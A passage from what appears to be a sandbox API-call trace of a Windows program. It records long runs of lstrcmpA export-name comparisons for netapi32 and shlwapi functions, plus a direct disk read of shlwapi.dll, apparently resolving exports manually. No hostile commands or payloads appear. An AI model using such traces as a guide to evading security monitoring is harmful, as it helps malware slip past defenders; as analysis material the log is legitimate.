lpString2="DsGetDcNextW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0122.938] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0122.939] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0122.940] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0122.940] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0122.941] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0122.942] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0122.943] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0122.943] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0122.944] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0122.944] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0122.944] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0122.944] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0122.944] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0122.944] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0122.944] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0122.944] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0122.948] GetProcessHeap () returned 0x480000 [0122.948] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cb5030 | out: hHeap=0x480000) returned 1 [0122.948] GetProcessHeap () returned 0x480000 [0122.948] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499260 [0122.948] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0122.949] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0122.949] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0122.949] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0122.949] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0122.949] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0122.949] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0122.949] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0122.950] GetProcessHeap () returned 0x480000 [0122.950] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x51148) returned 0x2cb5030 [0122.950] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0122.950] ReadFile (in: hFile=0x17c, lpBuffer=0x2cb5030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb5030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0122.955] CloseHandle (hObject=0x17c) returned 1 [0122.955] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0122.955] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0122.955] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0122.956] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0122.956] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0122.956] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0122.956] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0122.956] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0122.956] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0122.956] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0122.956] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0122.957] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0122.957] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0122.957] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0122.957] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0122.958] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0122.958] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0122.958] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0122.958] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0123.167] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0123.167] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0123.167] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0123.167] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0123.167] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0123.167] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0123.167] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0123.167] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0123.167] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0123.168] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0123.168] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0123.169] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0123.169] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0123.169] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0123.169] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0123.169] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0123.169] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0123.169] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0123.169] 